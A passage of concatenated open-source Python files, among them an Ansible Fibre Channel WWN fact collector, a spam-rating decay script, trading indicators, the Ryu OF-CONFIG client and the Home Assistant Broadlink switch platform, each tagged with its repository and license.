fc_facts['fibre_channel_wwn'].append(line.rstrip()[2:])
elif sys.platform.startswith('sunos'):
"""
on solaris 10 or solaris 11 should use `fcinfo hba-port`
TBD (not implemented): on solaris 9 use `prtconf -pv`
"""
cmd = module.get_bin_path('fcinfo')
cmd = cmd + " hba-port"
rc, fcinfo_out, err = module.run_command(cmd)
"""
# fcinfo hba-port | grep "Port WWN"
HBA Port WWN: 10000090fa1658de
"""
if fcinfo_out:
for line in fcinfo_out.splitlines():
if 'Port WWN' in line:
data = line.split(' ')
fc_facts['fibre_channel_wwn'].append(data[-1].rstrip())
elif sys.platform.startswith('aix'):
# get list of available fibre-channel devices (fcs)
cmd = module.get_bin_path('lsdev')
cmd = cmd + " -Cc adapter -l fcs*"
rc, lsdev_out, err = module.run_command(cmd)
if lsdev_out:
lscfg_cmd = module.get_bin_path('lscfg')
for line in lsdev_out.splitlines():
# if device is available (not in defined state), get its WWN
if 'Available' in line:
data = line.split(' ')
cmd = lscfg_cmd + " -vl %s" % data[0]
rc, lscfg_out, err = module.run_command(cmd)
# example output
# lscfg -vpl fcs3 | grep "Network Address"
# Network Address.............10000090FA551509
for line in lscfg_out.splitlines():
if 'Network Address' in line:
data = line.split('.')
fc_facts['fibre_channel_wwn'].append(data[-1].rstrip())
return fc_facts
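# Illustrative shape of the collected facts (WWN values are placeholders taken
# from the example strings in the docstrings above):
#   {'fibre_channel_wwn': ['21000014ff52a9bb', '10000090fa1658de']}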
| alxgu/ansible | lib/ansible/module_utils/facts/network/fc_wwn.py | Python | gpl-3.0 | 3,450 |
#!/usr/bin/env python
'''
This file is part of the ASNN eMail Suite.
ASNN-MDA is free software: you can redistribute it and/or modify
it under the terms of the version 2 GNU General Public License
as published by the Free Software Foundation.
ASNN-MDA is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
If you don't know about the GNU General Public License by now,
you can find information about it at http://www.gnu.org/licenses/
'''
# ASNN Reduction of Spam-Rating Process
'''
The intention of this tool is that it be run on a regular interval (like in a
'cron' job) to slightly reduce the spam-rating of each IP address or domain.
This is so the current spam-rating of each entry will slowly taper off unless
the entry is further bolstered by improper activity of the entity associated
with the entry.
Because the 'spamrating' field is an integer number, the minimum amount that
rating should be reduced is one unit per cycle. If this is not done, then
a 'spamrating' will never reach zero. If that is the intention, use the
provided option when invoking this program.
The rating may be reduced by a percentage or fixed integer amount. If reduced
by a decimal percentage, the reduction value is truncated to the next lower
integer value, but a minimum of '1' unless the 'zero' option is selected.
'''
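# Worked example (editorial illustration, not part of the original script):
# with a 10% percentage reduction and the default minimum of one unit, a
# spamrating of 25 drops by max(int(0.10 * 25), 1) = 2, while a rating of 5
# drops by max(int(0.10 * 5), 1) = 1; with the '-z' option the latter would
# drop by int(0.10 * 5) = 0.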
# -----------------------------------------------------------------------------
def convert_from_int(numericalip):
addressstr = ''
for index in range(4):
addressstr = (str(numericalip & 255) + '.' + addressstr)
numericalip /= 256
return addressstr[:-1]
# -----------------------------------------------------------------------------
import os, sys, time, socket, argparse
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "asnn.settings")
import django
django.setup()
from asnn import models
from django.core.exceptions import ObjectDoesNotExist
parser = argparse.ArgumentParser()
parser.add_argument("-v", dest='debug', action="count", default = 0, \
help="debug vebosity")
parser.add_argument("-t", dest='testrun', action = "store_true", \
help="test run, don't store values")
parser.add_argument("-z", dest='zero', action = "store_true", \
help="don't enforce minimum reduction of '1'")
parser.add_argument("-i", dest='ipaddrs', action = "store_true", \
help="process against IP addresses")
parser.add_argument("-d", dest='domains', action = "store_true", \
help="process against domains")
parser.add_argument("-l", dest='logfile', type=str, \
default = './asnn_reduce_spamrating.log', \
help="log file to save to")
parser.add_argument("-L", dest='nolog', action = "store_true", \
help="don't save to log file")
parser.add_argument("-p", dest='perreduct', type=str, \
default = None, help="percentage reduction of value")
parser.add_argument("-c", dest='linreduct', type=str, \
default = None, help="linear reduction of value")
args = parser.parse_args()
debug = args.debug
if debug > 0:
print >> sys.stderr, "Debug level set to", debug
if args.testrun:
print >> sys.stderr, "Test run, nothing to be saved"
if not args.ipaddrs and not args.domains:
print >> sys.stderr, "you need to specify whether to process against IPs or Domains"
sys.exit(1)
if not args.perreduct and not args.linreduct:
print >> sys.stderr, "you need to specify the reduction amount"
sys.exit(1)
if args.perreduct and args.linreduct:
print >> sys.stderr, "linear and percentage reduction cannot be used together"
sys.exit(1)
if args.perreduct:
try:
perreduct = float(args.perreduct) / 100.0
except:
print >> sys.stderr, "percentage reduction value is bad"
sys.exit(1)
else:
linreduct = None
if args.linreduct:
try:
linreduct = int(args.linreduct)
except:
print >> sys.stderr, "percentage reduction value is bad"
sys.exit(1)
else:
perreduct = None
if not args.nolog:
logfile = open(args.logfile, 'a')
else:
logfile = None
# -------------------------------------------
if args.ipaddrs:
if debug > 0:
print >> sys.stderr, "Processing against IP addresses"
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': IP addresses: ')
if args.testrun:
logfile.write('test run: ')
if perreduct:
logfile.write('percentage reduction of ' + str(perreduct * 100) + '%\n')
if linreduct:
logfile.write('linear reduction of ' + str(linreduct) + '\n')
for dobj in models.IPs.objects.filter(spamrating__gt = 0):
if debug > 1:
if dobj.addrlower == dobj.addrupper:
print >> sys.stderr, "address", convert_from_int(dobj.addrlower),
else:
print >> sys.stderr, "range", convert_from_int(dobj.addrlower) + '-' + \
convert_from_int(dobj.addrupper),
if perreduct:
if not args.zero:
reduction = max(int(perreduct * dobj.spamrating), 1)
else:
reduction = int(perreduct * dobj.spamrating)
else: # assumes 'linreduct' exists
reduction = linreduct
if debug > 1:
print >> sys.stderr, "reduced by", reduction
if not args.testrun:
dobj.spamrating -= reduction
dobj.save()
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': completed run\n')
# -------------------------------------------
if args.domains:
if debug > 0:
print >> sys.stderr, "Processing against domains"
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': Domains: ')
if args.testrun:
logfile.write('test run: ')
if perreduct:
logfile.write('percentage reduction of ' + str(perreduct * 100) + '%\n')
if linreduct:
logfile.write('linear reduction of ' + str(linreduct) + '\n')
for dobj in models.Domains.objects.filter(spamrating__gt = 0):
if debug > 1:
print >> sys.stderr, dobj.domain,
if perreduct:
if not args.zero:
reduction = max(int(perreduct * dobj.spamrating), 1)
else:
reduction = int(perreduct * dobj.spamrating)
else: # assumes 'linreduct' exists
reduction = linreduct
if debug > 1:
print >> sys.stderr, "reduced by", reduction
if not args.testrun:
dobj.spamrating -= reduction
dobj.save()
if logfile:
logfile.write(time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime()) + \
' PID ' + str(os.getpid()) + ': completed run\n')
| marvinglenn/asnn-mda | asnn_reduce_spamrating.py | Python | gpl-2.0 | 7,003 |
from __future__ import print_function
import pandas as pd
def RSI(prices, period=14):
"""
Developed J. Welles Wilder, the Relative Strength Index (RSI) is a
momentum oscillator that measures the speed and change of price
movements. RSI oscillates between zero and 100. Traditionally,
and according to Wilder, RSI is considered overbought when above 70
and oversold when below 30. Signals can also be generated by looking
for divergences, failure swings and centerline crossovers. RSI can
also be used to identify the general trend.
"""
df = prices.copy()
df['diff'] = df['close'].diff().fillna(0.0)
df['gain'] = df[df['diff'] > 0]['diff']
df['gain'].fillna(0.0, inplace=True)
df['loss'] = df[df['diff'] < 0]['diff'].abs()
df['loss'].fillna(0.0, inplace=True)
df['avg_gain'] = df['gain'].ewm(span=period+1).mean()
df['avg_loss'] = df['loss'].ewm(span=period+1).mean()
df['rs'] = df['avg_gain'] / df['avg_loss']
df['rs'].fillna(0.0, inplace=True)
rsi = 100. - (100. / (1 + df['rs']))
return rsi
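# Minimal usage sketch (editorial; the sample closing prices are made up,
# RSI only assumes a DataFrame with a 'close' column):
#
#   import pandas as pd
#   prices = pd.DataFrame({'close': [44.3, 44.1, 44.2, 43.6, 44.3, 44.8, 45.1]})
#   print(RSI(prices, period=6).tail())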
| nwillemse/nctrader | nctrader/indicators.py | Python | mit | 1,091 |
#!/usr/bin/env python
#
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# a simple command line OF-CONFIG client
#
# a usage example:
# % PYTHONPATH=. ./bin/of_config_cli \
# --peers=sw1=localhost:1830:username:password
# (Cmd) raw_get sw1
import ryu.contrib
from ryu import cfg
import cmd
import sys
import lxml.etree as ET
from ryu.lib import of_config
from ryu.lib.of_config import capable_switch
from ncclient.operations.rpc import RPCError
import ryu.lib.of_config.classes as ofc
CONF = cfg.CONF
CONF.register_cli_opts([
cfg.ListOpt('peers', default=[], help='list of peers')
])
class Peer(capable_switch.OFCapableSwitch):
def __init__(self, name, host, port, username, password):
self._name = name
super(Peer, self).__init__(
host=host, port=port, username=username, password=password,
unknown_host_cb=lambda host, fingeprint: True)
peers = {}
def add_peer(name, host, port, username, password):
peers[name] = Peer(name, host, port, username, password)
def et_tostring_pp(tree):
# pretty_print is an lxml feature, not available in ElementTree
try:
return ET.tostring(tree, pretty_print=True)
except TypeError:
return ET.tostring(tree)
def validate(tree):
schema = ET.XMLSchema(file=of_config.OF_CONFIG_1_1_1_XSD)
if not schema(tree):
print(schema.error_log)
class Cmd(cmd.Cmd):
def __init__(self, *args, **kwargs):
self._in_onecmd = False
cmd.Cmd.__init__(self, *args, **kwargs)
def _request(self, line, f):
args = line.split()
try:
peer = args[0]
except:
print("argument error")
return
try:
p = peers[peer]
except KeyError:
print("unknown peer " + peer)
return
try:
f(p, args[1:])
except RPCError as e:
print("RPC Error " + e)
except EOFError:
print("disconnected")
def _complete_peer(self, text, line, _begidx, _endidx):
if len((line + 'x').split()) >= 3:
return []
return [name for name in peers if name.startswith(text)]
def do_list_cap(self, line):
"""list_cap <peer>
"""
def f(p, args):
for i in p.netconf.server_capabilities:
print(i)
self._request(line, f)
def do_raw_get(self, line):
"""raw_get <peer>
"""
def f(p, args):
result = p.raw_get()
tree = ET.fromstring(result)
validate(tree)
print(et_tostring_pp(tree))
self._request(line, f)
def do_raw_get_config(self, line):
"""raw_get_config <peer> <source>
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
result = p.raw_get_config(source)
tree = ET.fromstring(result)
validate(tree)
print(et_tostring_pp(tree))
self._request(line, f)
def do_get(self, line):
"""get <peer>
eg. get sw1
"""
def f(p, args):
print(p.get())
self._request(line, f)
def do_commit(self, line):
"""commit <peer>
eg. commit sw1
"""
def f(p, args):
print(p.commit())
self._request(line, f)
def do_discard(self, line):
"""discard <peer>
eg. discard sw1
"""
def f(p, args):
print(p.discard_changes())
self._request(line, f)
def do_get_config(self, line):
"""get_config <peer> <source>
eg. get_config sw1 startup
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
print(p.get_config(source))
self._request(line, f)
def do_delete_config(self, line):
"""delete_config <peer> <source>
eg. delete_config sw1 startup
"""
def f(p, args):
try:
source = args[0]
except:
print("argument error")
return
print(p.delete_config(source))
self._request(line, f)
def do_copy_config(self, line):
"""copy_config <peer> <source> <target>
eg. copy_config sw1 running startup
"""
def f(p, args):
try:
source, target = args
except:
print("argument error")
return
print(p.copy_config(source, target))
self._request(line, f)
def do_list_port(self, line):
"""list_port <peer>
"""
def f(p, args):
o = p.get()
for p in o.resources.port:
print(p.resource_id + " " + p.name + " " + p.number)
self._request(line, f)
_port_settings = [
'admin-state',
'no-forward',
'no-packet-in',
'no-receive',
]
def do_get_port_config(self, line):
"""get_config_port <peer> <source> <port>
eg. get_port_config sw1 running LogicalSwitch7-Port2
"""
def f(p, args):
try:
source, port = args
except:
print("argument error")
return
o = p.get_config(source)
for p in o.resources.port:
if p.resource_id != port:
continue
print(p.resource_id)
conf = p.configuration
for k in self._port_settings:
try:
v = getattr(conf, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_port_config(self, line):
"""set_port_config <peer> <target> <port> <key> <value>
eg. set_port_config sw1 running LogicalSwitch7-Port2 admin-state down
eg. set_port_config sw1 running LogicalSwitch7-Port2 no-forward false
"""
def f(p, args):
try:
target, port, key, value = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
port=[
ofc.OFPortType(
resource_id=port,
configuration=ofc.OFPortConfigurationType(
**{key: value}))
]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_list_queue(self, line):
"""list_queue <peer>
"""
def f(p, args):
o = p.get()
if o.resources.queue:
for q in o.resources.queue:
print(q.resource_id + " " + q.port)
self._request(line, f)
_queue_settings = [
'max-rate',
'min-rate',
'experimenter',
]
def do_get_queue_config(self, line):
"""get_queue_port <peer> <source> <queue>
eg. get_queue_config sw1 running LogicalSwitch7-Port1-Queue922
"""
def f(p, args):
try:
source, queue = args
except:
print("argument error")
return
o = p.get_config(source)
for q in o.resources.queue:
if q.resource_id != queue:
continue
print(q.resource_id)
conf = q.properties
for k in self._queue_settings:
try:
v = getattr(conf, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_queue_config(self, line):
"""set_queue_config <peer> <target> <queue> <key> <value>
eg. set_queue_config sw1 running LogicalSwitch7-Port1-Queue922 \
max-rate 100
"""
def f(p, args):
try:
target, queue, key, value = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
queue=[
ofc.OFQueueType(
resource_id=queue,
properties=ofc.OFQueuePropertiesType(
**{key: value})),
]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_add_queue(self, line):
"""add_queue <peer> <target> <logical-switch> <queue>
eg. add_queue sw1 running LogicalSwitch7 NameOfNewQueue
"""
def f(p, args):
try:
target, lsw, queue = args
except:
print("argument error")
print(args)
return
# get switch id
o = p.get()
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
resources=ofc.OFCapableSwitchResourcesType(
queue=[
ofc.OFQueueType(resource_id=queue)
]
),
logical_switches=ofc.OFCapableSwitchLogicalSwitchesType(
switch=[ofc.OFLogicalSwitchType(
id=lsw,
resources=ofc.OFLogicalSwitchResourcesType(
queue=[queue])
)]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
def do_list_logical_switch(self, line):
"""list_logical_switch <peer>
"""
def f(p, args):
o = p.get()
for s in o.logical_switches.switch:
print(s.id + " " + s.datapath_id)
self._request(line, f)
def do_show_logical_switch(self, line):
"""show_logical_switch <peer> <logical switch>
"""
def f(p, args):
try:
(lsw,) = args
except:
print("argument error")
return
o = p.get()
for s in o.logical_switches.switch:
if s.id != lsw:
continue
print(s.id)
print('datapath-id ' + s.datapath_id)
if s.resources.queue:
print('queues:')
for q in s.resources.queue:
print('\t ' + q)
if s.resources.port:
print('ports:')
for p in s.resources.port:
print('\t ' + p)
self._request(line, f)
_lsw_settings = [
'lost-connection-behavior',
]
def do_get_logical_switch_config(self, line):
"""get_logical_switch_config <peer> <source> <logical switch>
"""
def f(p, args):
try:
source, lsw = args
except:
print("argument error")
return
o = p.get_config(source)
for l in o.logical_switches.switch:
if l.id != lsw:
continue
print(l.id)
for k in self._lsw_settings:
try:
v = getattr(l, k)
except AttributeError:
continue
print(k + " " + v)
self._request(line, f)
def do_set_logical_switch_config(self, line):
"""set_logical_switch_config <peer> <logical switch> <key> <value>
eg. set_logical_switch_config sw1 running LogicalSwitch7 \
lost-connection-behavior failStandaloneMode
"""
def f(p, args):
try:
target, lsw, key, value = args
except:
print("argument error")
return
# get switch id
o = p.get_config(target)
capable_switch_id = o.id
try:
capable_switch = ofc.OFCapableSwitchType(
id=capable_switch_id,
logical_switches=ofc.OFCapableSwitchLogicalSwitchesType(
switch=[ofc.OFLogicalSwitchType(
id=lsw,
**{key: value}
)]
)
)
except TypeError:
print("argument error")
return
try:
p.edit_config(target, capable_switch)
except Exception as e:
print(e)
self._request(line, f)
completedefault = _complete_peer
def complete_EOF(self, _text, _line, _begidx, _endidx):
return []
def do_EOF(self, _line):
sys.exit(0)
def onecmd(self, string):
self._in_onecmd = True
try:
return cmd.Cmd.onecmd(self, string)
finally:
self._in_onecmd = False
def main(args=None, prog=None):
CONF(args=args, prog=prog,
project='of-config-cli', version='of-config-cli')
for p_str in CONF.peers:
name, addr = p_str.split('=')
host, port, username, password = addr.rsplit(':', 3)
add_peer(name, host, port, username, password)
Cmd().cmdloop()
if __name__ == "__main__":
main()
| StephenKing/summerschool-2015-ryu | ryu/cmd/of_config_cli.py | Python | apache-2.0 | 15,540 |
# -*- coding: UTF-8 -*-
import numpy as np
import pandas as pd
import os
from dateutil.parser import parse
def _macd(closes):
    # MACD: DIF = EMA12 - EMA26, DEA = 9-period EMA of DIF;
    # the first returned value is the histogram, 2 * (DIF - DEA).
ema12 = _ema(closes, 12)
ema26 = _ema(closes, 26)
diff = ema12 - ema26
dea = _ema(diff, 9)
osc = diff - dea
return (osc * 2, diff, dea)
def _ma(closes, cycle=5):
result = np.zeros(cycle)
for i in np.arange(cycle, closes.size):
result = np.append(result, [np.mean(closes[i - cycle:i])])
return result
def _ema(closes, cycle=12):
    # Exponential moving average with smoothing factor a = 2 / (cycle + 1).
if closes.size <= 0:
return np.array([])
a = 2 / np.float64((cycle + 1))
ema0 = closes[0]
result = np.array([ema0])
def curema(index, value):
return result[index - 1] + a * (value - result[index - 1])
for i in np.arange(1, closes.size):
result = np.append(result, [curema(i, closes[i])])
return result
def splicsvpath(csvpath):
bn = os.path.basename(csvpath)
filename, ext = os.path.splitext(bn)
return (filename[2:], filename[:2])
class Stock:
def __init__(self, csvpath, cal=True):
self.symbol, self.code = splicsvpath(csvpath)
self.datas = [{
'date': parse(d[1]).date(),
'open': np.float64(d[2]),
'high': np.float64(d[3]),
'low': np.float64(d[4]),
'close': np.float64(d[5]),
'volume': np.float64(d[6])
} for d in pd.read_csv(csvpath).as_matrix()]
if cal:
closes = np.array([d['close'] for d in self.datas])
self.macd, self.div, self.dea = _macd(closes)
self.em5 = _ma(closes, 5)
self.em10 = _ma(closes, 10)
self.em20 = _ma(closes, 20)
self.em30 = _ma(closes, 30)
self.em60 = _ma(closes, 60)
self.ema5 = _ema(closes, 5)
self.ema10 = _ema(closes, 10)
self.ema20 = _ema(closes, 20)
self.ema60 = _ema(closes, 60)
def length(self):
return len(self.datas)
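# Minimal usage sketch (editorial; the file name is a placeholder, and the
# loader expects a CSV whose columns, after the index, are date, open, high,
# low, close, volume, as read above):
#
#   s = Stock('sh600000.csv')
#   print(s.code, s.symbol, s.length())   # -> 'sh' '600000' <number of rows>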
| m860/data-analysis-with-python | filter/Stock.py | Python | mit | 2,079 |
"""
Support for Broadlink RM devices.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.broadlink/
"""
from datetime import timedelta
from base64 import b64encode, b64decode
import asyncio
import binascii
import logging
import socket
import voluptuous as vol
from homeassistant.util.dt import utcnow
from homeassistant.util import Throttle
from homeassistant.components.switch import (SwitchDevice, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_FRIENDLY_NAME, CONF_SWITCHES,
CONF_COMMAND_OFF, CONF_COMMAND_ON,
CONF_TIMEOUT, CONF_HOST, CONF_MAC, CONF_TYPE)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['broadlink==0.5']
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=5)
DOMAIN = 'broadlink'
DEFAULT_NAME = 'Broadlink switch'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
SERVICE_LEARN = 'learn_command'
SERVICE_SEND = 'send_packet'
CONF_SLOTS = 'slots'
RM_TYPES = ['rm', 'rm2', 'rm_mini', 'rm_pro_phicomm', 'rm2_home_plus',
'rm2_home_plus_gdt', 'rm2_pro_plus', 'rm2_pro_plus2',
'rm2_pro_plus_bl', 'rm_mini_shate']
SP1_TYPES = ['sp1']
SP2_TYPES = ['sp2', 'honeywell_sp2', 'sp3', 'spmini2', 'spminiplus']
MP1_TYPES = ["mp1"]
SWITCH_TYPES = RM_TYPES + SP1_TYPES + SP2_TYPES + MP1_TYPES
SWITCH_SCHEMA = vol.Schema({
vol.Optional(CONF_COMMAND_OFF, default=None): cv.string,
vol.Optional(CONF_COMMAND_ON, default=None): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
})
MP1_SWITCH_SLOT_SCHEMA = vol.Schema({
vol.Optional('slot_1'): cv.string,
vol.Optional('slot_2'): cv.string,
vol.Optional('slot_3'): cv.string,
vol.Optional('slot_4'): cv.string
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SWITCHES, default={}):
vol.Schema({cv.slug: SWITCH_SCHEMA}),
vol.Optional(CONF_SLOTS, default={}): MP1_SWITCH_SLOT_SCHEMA,
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_TYPE, default=SWITCH_TYPES[0]): vol.In(SWITCH_TYPES),
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int
})
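# Illustrative configuration.yaml entry for this platform (keys mirror the
# schema above; host, mac and the base64 packets are placeholders):
#
#   switch:
#     - platform: broadlink
#       host: 192.168.1.2
#       mac: 'AA:BB:CC:DD:EE:FF'
#       type: rm2
#       switches:
#         tv:
#           friendly_name: "Living room TV"
#           command_on: 'JgAaAB0dHB4dHhwdHR4...'
#           command_off: 'JgAaAB0dHB4dHhwdHR4...'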
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Broadlink switches."""
import broadlink
devices = config.get(CONF_SWITCHES)
slots = config.get('slots', {})
ip_addr = config.get(CONF_HOST)
friendly_name = config.get(CONF_FRIENDLY_NAME)
mac_addr = binascii.unhexlify(
config.get(CONF_MAC).encode().replace(b':', b''))
switch_type = config.get(CONF_TYPE)
@asyncio.coroutine
def _learn_command(call):
try:
auth = yield from hass.async_add_job(broadlink_device.auth)
except socket.timeout:
_LOGGER.error("Failed to connect to device, timeout")
return
if not auth:
_LOGGER.error("Failed to connect to device")
return
yield from hass.async_add_job(broadlink_device.enter_learning)
_LOGGER.info("Press the key you want HASS to learn")
start_time = utcnow()
while (utcnow() - start_time) < timedelta(seconds=20):
packet = yield from hass.async_add_job(
broadlink_device.check_data)
if packet:
log_msg = "Recieved packet is: {}".\
format(b64encode(packet).decode('utf8'))
_LOGGER.info(log_msg)
hass.components.persistent_notification.async_create(
log_msg, title='Broadlink switch')
return
yield from asyncio.sleep(1, loop=hass.loop)
_LOGGER.error("Did not received any signal")
hass.components.persistent_notification.async_create(
"Did not received any signal", title='Broadlink switch')
@asyncio.coroutine
def _send_packet(call):
packets = call.data.get('packet', [])
for packet in packets:
for retry in range(DEFAULT_RETRY):
try:
extra = len(packet) % 4
if extra > 0:
packet = packet + ('=' * (4 - extra))
payload = b64decode(packet)
yield from hass.async_add_job(
broadlink_device.send_data, payload)
break
except (socket.timeout, ValueError):
try:
yield from hass.async_add_job(
broadlink_device.auth)
except socket.timeout:
if retry == DEFAULT_RETRY-1:
_LOGGER.error("Failed to send packet to device")
def _get_mp1_slot_name(switch_friendly_name, slot):
if not slots['slot_{}'.format(slot)]:
return '{} slot {}'.format(switch_friendly_name, slot)
return slots['slot_{}'.format(slot)]
if switch_type in RM_TYPES:
broadlink_device = broadlink.rm((ip_addr, 80), mac_addr)
hass.services.register(DOMAIN, SERVICE_LEARN + '_' +
ip_addr.replace('.', '_'), _learn_command)
hass.services.register(DOMAIN, SERVICE_SEND + '_' +
ip_addr.replace('.', '_'), _send_packet)
switches = []
for object_id, device_config in devices.items():
switches.append(
BroadlinkRMSwitch(
device_config.get(CONF_FRIENDLY_NAME, object_id),
broadlink_device,
device_config.get(CONF_COMMAND_ON),
device_config.get(CONF_COMMAND_OFF)
)
)
elif switch_type in SP1_TYPES:
broadlink_device = broadlink.sp1((ip_addr, 80), mac_addr)
switches = [BroadlinkSP1Switch(friendly_name, broadlink_device)]
elif switch_type in SP2_TYPES:
broadlink_device = broadlink.sp2((ip_addr, 80), mac_addr)
switches = [BroadlinkSP2Switch(friendly_name, broadlink_device)]
elif switch_type in MP1_TYPES:
switches = []
broadlink_device = broadlink.mp1((ip_addr, 80), mac_addr)
parent_device = BroadlinkMP1Switch(broadlink_device)
for i in range(1, 5):
slot = BroadlinkMP1Slot(
_get_mp1_slot_name(friendly_name, i),
broadlink_device, i, parent_device)
switches.append(slot)
broadlink_device.timeout = config.get(CONF_TIMEOUT)
try:
broadlink_device.auth()
except socket.timeout:
_LOGGER.error("Failed to connect to device")
add_devices(switches)
class BroadlinkRMSwitch(SwitchDevice):
"""Representation of an Broadlink switch."""
def __init__(self, friendly_name, device, command_on, command_off):
"""Initialize the switch."""
self._name = friendly_name
self._state = False
self._command_on = b64decode(command_on) if command_on else None
self._command_off = b64decode(command_off) if command_off else None
self._device = device
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn the device on."""
if self._sendpacket(self._command_on):
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
if self._sendpacket(self._command_off):
self._state = False
self.schedule_update_ha_state()
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
if packet is None:
_LOGGER.debug("Empty packet")
return True
try:
self._device.send_data(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
class BroadlinkSP1Switch(BroadlinkRMSwitch):
"""Representation of an Broadlink switch."""
def __init__(self, friendly_name, device):
"""Initialize the switch."""
super().__init__(friendly_name, device, None, None)
self._command_on = 1
self._command_off = 0
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
try:
self._device.set_power(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
class BroadlinkSP2Switch(BroadlinkSP1Switch):
"""Representation of an Broadlink switch."""
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return False
@property
def should_poll(self):
"""Return the polling state."""
return True
def update(self):
"""Synchronize state with switch."""
self._update()
def _update(self, retry=2):
try:
state = self._device.check_power()
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return
if not self._auth():
return
return self._update(retry-1)
if state is None and retry > 0:
return self._update(retry-1)
self._state = state
class BroadlinkMP1Slot(BroadlinkRMSwitch):
"""Representation of a slot of Broadlink switch."""
def __init__(self, friendly_name, device, slot, parent_device):
"""Initialize the slot of switch."""
super().__init__(friendly_name, device, None, None)
self._command_on = 1
self._command_off = 0
self._slot = slot
self._parent_device = parent_device
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return False
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
try:
self._device.set_power(self._slot, packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, max(0, retry-1))
return True
@property
def should_poll(self):
"""Polling needed."""
return True
def update(self):
"""Trigger update for all switches on the parent device."""
self._parent_device.update()
self._state = self._parent_device.get_outlet_status(self._slot)
class BroadlinkMP1Switch(object):
"""Representation of a Broadlink switch - To fetch states of all slots."""
def __init__(self, device):
"""Initialize the switch."""
self._device = device
self._states = None
def get_outlet_status(self, slot):
"""Get status of outlet from cached status list."""
return self._states['s{}'.format(slot)]
@Throttle(TIME_BETWEEN_UPDATES)
def update(self):
"""Fetch new state data for this device."""
self._update()
def _update(self, retry=2):
try:
states = self._device.check_power()
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return
if not self._auth():
return
return self._update(max(0, retry-1))
if states is None and retry > 0:
return self._update(max(0, retry-1))
self._states = states
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
| ewandor/home-assistant | homeassistant/components/switch/broadlink.py | Python | apache-2.0 | 12,810 |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import unittest
import urllib2
from webkitpy.common.net.rietveld import filter_latest_jobs
from webkitpy.common.net.rietveld import get_latest_try_job_results
